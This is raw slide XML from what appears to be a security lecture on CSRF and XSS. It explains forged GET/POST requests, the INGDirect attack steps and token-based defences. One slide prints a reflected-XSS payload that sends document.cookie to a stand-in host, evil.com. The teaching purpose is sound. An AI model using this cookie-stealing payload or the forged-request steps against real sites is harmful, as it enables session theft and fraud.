              <a:t>The image-tag from evil.com forces a FORGED GET request to be sent to Bank by victim’s browser.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2" name="CustomShape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9317880" y="690840"/>
            <a:ext cx="3144600" cy="1042560"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 28750"/>
              <a:gd name="adj2" fmla="val 254524"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="8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/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2300" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="0d0d0d"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="ヒラギノ角ゴ ProN W3"/>
              </a:rPr>
              <a:t>Transfer funds from one account to another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33" name="CustomShape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10895040" y="3833640"/>
            <a:ext cx="1944000" cy="826560"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd name="adj" fmla="val 28569"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="dddddd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0458c"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="ヒラギノ角ゴ ProN W3"/>
              </a:rPr>
              <a:t>transfer.cgi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4" name="CustomShape 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10134360" y="2384280"/>
            <a:ext cx="242352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Webbank.com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7A46256A-7C9D-487B-A5B2-B8A376367960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-12600" y="0"/>
            <a:ext cx="13017240" cy="1708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What can we Learn from the</a:t>
            </a:r>
            <a:br/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 CSRF Bank Attack Example?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381600" y="1852560"/>
            <a:ext cx="12241080" cy="74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CSRF attack: When a malicious website causes a user</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="a40800"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>’</a:t>
            </a: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s browser to perform unwanted actions on a trusted website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Necessary condition for attack to take place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user must be capable of executing “unwanted” actions on trusted website, i.e., have implicit authentication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trusted website only checks that an action came from an authenticated user’s browser, and not the user itself (i.e., no way to check if user authorized the action)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="27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user must be social-engineered to visit malicious website during the authenticated session with the trusted website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In this particular example, the attacker had to know the “from” account number as well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1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58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71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40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61" end="6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45FC0067-4B57-40DA-A950-7F216F784966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-12600" y="0"/>
            <a:ext cx="13017240" cy="1708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Can the use of SSL prevent CSRF?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381600" y="1852560"/>
            <a:ext cx="12241080" cy="74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Not necessarily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Goes back to implicit authentication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user’s browser records session information when she is connected to trusted site the first time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Any subsequent requests sent by the browser are “helpfully” appended with session information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2" marL="13716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Username, password, or SSL certificates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Hence, SSL does not necessarily protect the user against CSRF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A sure shot way is for the user to authenticate every request. No implicit authentication. Such an approach will make browsers unusable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5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56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51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92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55" end="4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D6749CDD-91C3-413E-85C2-327678781E4D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-12600" y="0"/>
            <a:ext cx="13017240" cy="1708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POST request-based CSRF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381600" y="1636560"/>
            <a:ext cx="12241080" cy="74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In the bank example we saw the CSRF employed a forged GET request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It is possible to execute a CSRF with a POST request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Why care? Some sites only accept POST requests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Executing a POST-based CSRF requires JavaScript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Dynamically creates appropriate POST request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04" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="205" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst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2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72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22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FAAE3903-F901-4D3F-BF32-484D794DCFAE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-12600" y="0"/>
            <a:ext cx="13017240" cy="1708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Another Example: GET and POST CSRF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381600" y="1636560"/>
            <a:ext cx="12241080" cy="741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Actual attack discovered by Zeller and Felten on INGDirect.com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Multinational company with $62 Billion in assets and 4.1 million customers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attack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Allowed an attacker to open additional accounts on behalf of a user and transfer funds from a user’s account to the attacker’s account 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bank site’s use of SSL didn’t prevent the attack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3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3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First published CSRF on a financial institution (2008)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="33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A7712766-DAFE-469B-B10E-69C9A49ACC26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-12600" y="0"/>
            <a:ext cx="13017240" cy="1708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Ingdirect.com Attack: GET and POST CSRF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453600" y="1924560"/>
            <a:ext cx="12241080" cy="70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Step 0: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Assume user is already authenticated to ingdirect.com’s site, and visits evil.com controlled by attacker</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US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Assume attacker has JavaScript on his evil.com, and JavaScript engine is enabled on user’s browser. JavaScript is needed to create POST requests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Step 1: The attacker creates checking account on behalf of the user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attacker causes the user’s browser to visit ING’s “open new account” page using an SRC tag on an image on evil.com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A forged GET request to https://secure.ingdirect.com/myaccount/ INGDirect.html?command= gotoOpenOCA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1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62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31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51" end="5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19DAC8A3-71D8-490C-8D90-00A97B2C63F9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-12600" y="0"/>
            <a:ext cx="13017240" cy="1708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Ingdirect.com Attack: GET and POST CSRF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453600" y="1924560"/>
            <a:ext cx="12241080" cy="70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Step 2: Causes a “single” account to be created using an appropriate POST command that is generated by JavaScript loaded into user’s browser from evil.com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Step 3: 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The attacker chooses an arbitrary amount of money to initially transfer from the user’s savings account to the new, fraudulent account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A POST request to https://secure. ingdirect.com/myaccount/ INGDirect.html with the appropriate parameters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Step 4: The attacker causes the user’s browser to click the final “Open Account” button, causing ING to open a new checking account on behalf of the user using an appropriate POST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Step 5: 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The attacker adds himself as a payee to the user’s account, transfers money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56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00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07" end="5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588" end="6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66CC4CD5-05F9-433D-A041-FBD8BD3434ED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-12600" y="0"/>
            <a:ext cx="13017240" cy="1780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Preventing CSRF</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="5600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans"/>
                <a:ea typeface="ヒラギノ角ゴ ProN W3"/>
              </a:rPr>
              <a:t>Server-side Protection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309600" y="2140560"/>
            <a:ext cx="12313080" cy="60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Allow GET request to only retrieve data and not modify data on the server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Require all POSTs requests to contain a pseudo-random value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Trusted site generates pseudo-random value R, and sets it as a cookie on user’s browser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Every form submission (POST) to include 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Request valid only if form value == cookie value</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3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64" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="265" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst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37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2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69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072A50EB-DA3D-43AE-85D4-03C86BD8EA0F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-12600" y="0"/>
            <a:ext cx="13017240" cy="1780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Preventing CSRF</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="5600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans"/>
                <a:ea typeface="ヒラギノ角ゴ ProN W3"/>
              </a:rPr>
              <a:t>Server-side Protection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453600" y="5308920"/>
            <a:ext cx="1209708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Assume that the attacker cannot modify cookie values or read data sent from server to user (same origin policy), i.e., does not know R.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2" marL="13716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Hence, cannot forge appropriate requests through his evil.com website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We assume R is hash value of session credentials and some random data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9" name="Picture 1" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="741600" y="1852560"/>
            <a:ext cx="11521080" cy="3097440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="460" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4414320" y="9125280"/>
            <a:ext cx="81367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Sources:  Zeller&amp;Felten paper and  https://www.whitehatsec.com/resource/stats.html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86" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="287" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst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13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20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2D0D6584-44F6-4EF7-AC76-AF1E6849FA29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-12600" y="0"/>
            <a:ext cx="13004280" cy="18918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Today</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="5600" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0000ff"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ヒラギノ角ゴ ProN W3"/>
              </a:rPr>
              <a:t>’</a:t>
            </a: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s Lecture</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="5600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="a40800"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans"/>
                <a:ea typeface="ヒラギノ角ゴ ProN W3"/>
              </a:rPr>
              <a:t>Cross-site Request Forgery (CSRF) Attacks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885960" y="2428920"/>
            <a:ext cx="11161440" cy="63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What is a Cross-site Request Forgery (CSRF) attack?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How they differ from XSS attacks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Examples and potential for damage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Measures that do not work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Methods to prevent/protect against such attacks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Server-side to prevent CSRF attacks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lvl="1" marL="9716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Client-side to protect against CSRF attacks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8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23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5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9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36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A5A51B6B-EB4E-4655-9C68-C33C203EBADC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-12600" y="0"/>
            <a:ext cx="13042440" cy="939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60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XSS vs. CSRF</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="60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381600" y="1564560"/>
            <a:ext cx="12313080" cy="75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CSRF (Cross-site request forgery)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When a malicious website causes a user</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="a40800"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="26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s browser to perform unwanted actions on a trusted website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Leverages implicit authentication in user’s browser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XSS (Cross-site scripting)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="26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Malicious website leverages bugs in trusted website to cause unwanted action on user</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="a40800"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="26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s browser </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>(circumventing the same-origin policy)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Leverages bugs on naïve.com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Techniques that protect against XSS: filter content posted on websites for scripts.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Does not directly help protect against CSRF. Why?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If site is vulnerable to XSS, it is vulnerable to CSRF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 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Why? Session credentials can be stolen using XSS, and then launch a CSRF.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8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15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49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78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64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15" end="5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72" end="6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78" end="4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AC7E705E-3899-42C0-94B5-A955B5C60F53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-12600" y="0"/>
            <a:ext cx="13017240" cy="1420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What is CSRF and Why Should you Care?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80880" y="1492200"/>
            <a:ext cx="12189960" cy="75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When a malicious website causes a user</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="a40800"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="28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s browser to perform unwanted actions on a trusted website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Called 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sleeping giants of web vulnerabilities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”</a:t>
            </a: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 - Zeller &amp; Felten 2008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Sometimes also referred to as XSRF attacks, confused deputy, session riding,..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The percentage of CSRF is 20% of all Web vulnerabilities in 2012*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High profile attacks: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Ebay’s Korea website was attacked in 2008 with 18 million users lost personal information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Mexico bank attack in 2008 caused lost of account information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5926320" y="9269280"/>
            <a:ext cx="6624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* https://www.whitehatsec.com/resource/stats.html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55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22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45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36" end="4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B8E8E65A-365F-4EC3-AA4E-30D848078ECA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-12600" y="0"/>
            <a:ext cx="13042440" cy="9396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60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XSS vs. CSRF</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="60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81600" y="1204560"/>
            <a:ext cx="12241080" cy="79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CSRF (Cross-site request forgery)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When a malicious website causes a user</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="a40800"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>’</a:t>
            </a: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s browser to perform unwanted actions on a trusted website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Examples: Transfer money out of user’s account, harvest user ids, compromise user accounts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XSS (Cross-site scripting)</a:t>
            </a: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 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a408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Malicious website leverages bugs in trusted website to cause unwanted action on user</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="a40800"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="a40800"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>s browser </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>(circumventing the same-origin policy)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Examples: Reading cookies,  authentication information,  code injection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Unlike XSS, which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser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SzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="27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Techniques that protect against XSS will not necessarily work for CSRF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2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55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90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63" end="5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95" end="6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7C85961F-E561-490B-ABDF-1C433BC132AE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-25560" y="0"/>
            <a:ext cx="13029840" cy="1420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High-level View of How CSRF Works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pic>
        <p:nvPicPr>
          <p:cNvPr id="346" name="Picture 4" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3405960" y="1420560"/>
            <a:ext cx="5904360" cy="7514640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9886680" y="8909280"/>
            <a:ext cx="2520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Reference: Zeller &amp; Felten 2008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0" y="0"/>
            <a:ext cx="13004280" cy="134820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ahoma"/>
                <a:ea typeface="ヒラギノ角ゴ ProN W3"/>
              </a:rPr>
              <a:t>XSRF (aka CSRF): Summary</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="6000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="349" name="Picture 18" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="866880" y="4088880"/>
            <a:ext cx="2043000" cy="2043000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="350" name="Picture 11" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8464320" y="2639520"/>
            <a:ext cx="1643400" cy="2020320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="351" name="Picture 4" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7586280" y="7358040"/>
            <a:ext cx="3465360" cy="1203120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="352" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7995960" y="6816240"/>
            <a:ext cx="2628000" cy="55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Attack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7766280" y="2031840"/>
            <a:ext cx="2737440" cy="55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Server victim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 flipV="1">
            <a:off x="3452040" y="3209760"/>
            <a:ext cx="4025160" cy="87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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432000" y="6041880"/>
            <a:ext cx="2269800" cy="55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User victim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 rot="20890800">
            <a:off x="3761640" y="2946960"/>
            <a:ext cx="3278520" cy="55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establish session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 rot="10800000">
            <a:off x="6734880" y="8019720"/>
            <a:ext cx="4133520" cy="151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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20856600">
            <a:off x="3598560" y="3965400"/>
            <a:ext cx="3839400" cy="55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send forged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3235320" y="5635440"/>
            <a:ext cx="4025160" cy="14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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1122000">
            <a:off x="4339080" y="5788800"/>
            <a:ext cx="2352240" cy="55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visit server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 rot="1122000">
            <a:off x="3058200" y="6676200"/>
            <a:ext cx="4169880" cy="98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receive malicious page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3382200" y="3273840"/>
            <a:ext cx="518760" cy="5187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3" name="CustomShape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3924000" y="5310360"/>
            <a:ext cx="518760" cy="5187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4" name="CustomShape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1068600">
            <a:off x="2777040" y="5915160"/>
            <a:ext cx="518760" cy="5187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3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5" name="CustomShape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3467880" y="4214520"/>
            <a:ext cx="4025160" cy="87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16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3142800" y="4443480"/>
            <a:ext cx="518760" cy="518760"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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7" name="CustomShape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703800" y="8669880"/>
            <a:ext cx="8813880" cy="55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Q: how long do you stay logged on to the Bank?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8" name="CustomShape 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10186920" y="8886600"/>
            <a:ext cx="2709000" cy="6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 anchor="b"/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="850"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>slide </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="17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10186920" y="8886600"/>
            <a:ext cx="2709000" cy="649800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:solidFill>
              <a:srgbClr val="ffffff"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="129960" rIns="129960" tIns="65160" bIns="65160" anchor="ctr"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="b7c1eb"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>slide </a:t>
            </a:r>
            <a:fld id="{78634C64-F080-4836-8C9D-E5FA07AF6F58}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="b7c1eb"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1700" spc="-1" strike="noStrike">
              <a:latin typeface="Times New Roman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0" y="0"/>
            <a:ext cx="13004280" cy="1059840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="131040" rIns="131040" tIns="65520" bIns="65520" anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="5700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>XSS: Cross-Site Scripting</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="57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466960" y="2253240"/>
            <a:ext cx="1478880" cy="7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victim’s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browser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2" name="Line 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6827400" y="3445200"/>
            <a:ext cx="4009680" cy="45612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8019720" y="3359520"/>
            <a:ext cx="1297800" cy="43884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>
            <a:off x="650160" y="3467880"/>
            <a:ext cx="1191600" cy="5395680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28440">
            <a:solidFill>
              <a:schemeClr val="bg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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="560160" y="2487960"/>
            <a:ext cx="15458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 algn="ctr">
              <a:lnSpc>
                <a:spcPct val="8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evil.com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6" name="CustomShape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5960520" y="3467880"/>
            <a:ext cx="866520" cy="5395680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28440">
            <a:solidFill>
              <a:schemeClr val="bg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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10837440" y="3382200"/>
            <a:ext cx="1191600" cy="5395680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28440">
            <a:solidFill>
              <a:schemeClr val="bg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10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1842120" y="4334760"/>
            <a:ext cx="4118400" cy="32508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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2211120" y="4118040"/>
            <a:ext cx="3150000" cy="39528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Access some web page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Line 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1842120" y="4984920"/>
            <a:ext cx="4118400" cy="32508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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2059200" y="4768560"/>
            <a:ext cx="3575880" cy="167328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&lt;FRAME SRC=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http://naive.com/hello.cgi?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name=&lt;script&gt;win.open(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“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http://evil.com/steal.cgi?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cookie=”+document.cookie)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&lt;/script&gt;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CustomShape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2167560" y="6610680"/>
            <a:ext cx="3467520" cy="974880"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 21287"/>
              <a:gd name="adj2" fmla="val -88194"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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/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</a:rPr>
              <a:t>Forces victim’s browser to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</a:rPr>
              <a:t>call hello.cgi on naive.com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</a:rPr>
              <a:t>with this script as “name”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3" name="Line 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6827400" y="5201640"/>
            <a:ext cx="4009680" cy="32508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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7044120" y="4985280"/>
            <a:ext cx="3575880" cy="146016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GET/ hello.cgi?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name=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&lt;script&gt;win.open(“http://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evil.com/steal.cgi?cookie”+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document.cookie)&lt;/script&gt;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5" name="CustomShape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10916640" y="5420880"/>
            <a:ext cx="1783440" cy="84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>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="26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hello.cgi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6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executed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86" name="Line 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6827400" y="6719040"/>
            <a:ext cx="4009680" cy="45612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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7152480" y="6423480"/>
            <a:ext cx="3575880" cy="167328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&lt;HTML&gt;Hello, dear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&lt;script&gt;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win.open(“http://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evil.com/steal.cgi?cookie=”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Tahoma"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>+document.cookie)</a:t>
            </a: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&lt;/script&gt;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Welcome!&lt;/HTML&gt;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CustomShape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7407720" y="8019720"/>
            <a:ext cx="3103920" cy="1299960"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 20546"/>
              <a:gd name="adj2" fmla="val -78819"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
